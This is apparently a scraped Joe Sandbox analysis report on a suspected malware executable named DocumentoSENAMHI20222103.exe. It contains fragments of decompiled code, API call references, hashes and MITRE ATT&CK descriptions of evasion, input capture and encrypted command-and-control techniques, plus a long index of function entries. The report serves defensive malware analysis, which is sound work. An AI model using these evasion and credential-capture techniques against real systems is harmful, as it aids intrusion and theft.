							L3:
							 *_t13 = 0x4008;
							return 1;
						}
						_push(0x13);
						goto L2;
					}
					goto L3;
				}
				_push(8);
				goto L2;
			}

0x001521ff
0x00152201
0x0015220d
0x00152224
0x00152237
0x00152247
0x0015224f
0x00000000
0x0015224f
0x00152249
0x00152211
0x00152211
0x00152212
0x00152212
0x00000000
0x00152217
0x00152239
0x00000000
0x00152239
0x00000000
0x00152226
0x0015220f
0x00000000

APIs

lstrcmpiA.KERNEL32(?,00165EBC,?,00000000,00000000,001524CA,?,26A91022,?,00000000,?,?,?,0016088D,000000FF), ref: 00152209
lstrcmpiA.KERNEL32(?,00165EC0,?,00153194,?,00000000,?,?,?,?,0002001F), ref: 00152220
lstrcmpiA.KERNEL32(?,00165EC4,?,00153194,?,00000000,?,?,?,?,0002001F), ref: 00152233
lstrcmpiA.KERNEL32(?,00165EC8,?,00153194,?,00000000,?,?,?,?,0002001F), ref: 00152243

Memory Dump Source

Source File: 00000000.00000002.921060002.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.921053938.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921074420.0000000000161000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921082295.0000000000169000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921086723.000000000016A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921797899.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.921896034.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_DocumentoSENAMHI20222103.jbxd

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ec3eb18404b68a7219ced943fc283f1b49e8b6264f9ee3a278fe10497b866179
Instruction ID: 068269c2becc0419dc6d6cf7fd524b8c7a34504036d9ece53309dc31aa99755d
Opcode Fuzzy Hash: ec3eb18404b68a7219ced943fc283f1b49e8b6264f9ee3a278fe10497b866179
Instruction Fuzzy Hash: 36F0823F384703F2D72411695C81F3B41995FA7B53F21403AFE65EA080E7B1CC492225

Uniqueness

Uniqueness Score: -1.00%

Target ID:	0
Start time:	14:33:05
Start date:	21/03/2022
Path:	C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe"
Imagebase:	0x150000
File size:	1320960 bytes
MD5 hash:	81BA3D2DE48272D692C4E6604E6B1DB9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DocumentoSENAMHI20222103.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: DocumentoSENAMHI20222103.exePID: 1268, Parent PID: 3352

General

Chronological Activities

Disassembly

Analysis Process: DocumentoSENAMHI20222103.exePID: 1268, Parent PID: 3352COMMON

Execution Graph

Graph

Executed Functions

Function 00154AEF Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Control-flow Graph

Function 00153A84 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109memorywindowsleepCOMMON

Control-flow Graph

Windows Analysis Report
DocumentoSENAMHI20222103.exe

Function 00154AEF Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 00153A84 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109
memorywindowsleepCOMMON

Function 00153A86 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108
memorywindowsleepCOMMON

Function 0015803C Relevance: 4.6, APIs: 3, Instructions: 102
COMMON

Function 00157FEA Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Function 0015B905 Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Function 00159E27 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Function 00153BDD Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Function 00151B39 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 166
libraryCOMMON

Function 001571A3 Relevance: 6.1, APIs: 4, Instructions: 83
memoryCOMMON

Function 00154959 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Function 001572E0 Relevance: 4.6, APIs: 3, Instructions: 77
COMMONLIBRARYCODE

Function 00157B8E Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Function 0015FA9C Relevance: 1.8, APIs: 1, Instructions: 274
COMMONLIBRARYCODECrypto

Function 00154775 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Function 0015A22B Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Function 001514A2 Relevance: 1.5, APIs: 1, Instructions: 35
comCOMMON

Function 0015B2B8 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Function 00159DF6 Relevance: .0, Instructions: 22
COMMONLIBRARYCODE

Function 001529E8 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 208
memoryCOMMON

Function 00152DA0 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 438
stringregistryCOMMON

Function 00152440 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 353
COMMON

Function 0015BFF1 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Function 00158F8C Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Function 00156111 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303
COMMONLIBRARYCODE

Function 00151348 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 49
registrylibraryloaderCOMMON

Function 001512E5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 41
registrylibraryloaderCOMMON

Function 00151596 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40
libraryloaderCOMMON

Function 00155570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122
COMMON

Function 001596F7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMONLIBRARYCODE

Function 0015BD49 Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Function 001513BB Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 37
libraryloaderCOMMON

Function 00157C13 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Function 0015D4C5 Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Function 00155DDA Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Function 0015A6B8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Function 00156E42 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Function 0015D164 Relevance: 7.7, APIs: 5, Instructions: 199
COMMON

Function 00152327 Relevance: 7.6, APIs: 6, Instructions: 117
COMMON

Function 0015BCA8 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Function 0015A03C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Function 00152049 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104
COMMON

Function 00151E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103
COMMON

Function 00155EBA Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Function 00159F50 Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Function 00151A54 Relevance: 6.1, APIs: 4, Instructions: 77
COMMON

Function 001590A4 Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Function 001591FB Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Function 0015F486 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Function 001585AB Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Function 00157CE5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Function 001564B6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Function 00152C50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105
stringCOMMON

Function 00151DBF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Function 00151F97 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63
COMMON

Function 00153F8E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Function 001521F6 Relevance: 5.0, APIs: 4, Instructions: 44
stringCOMMON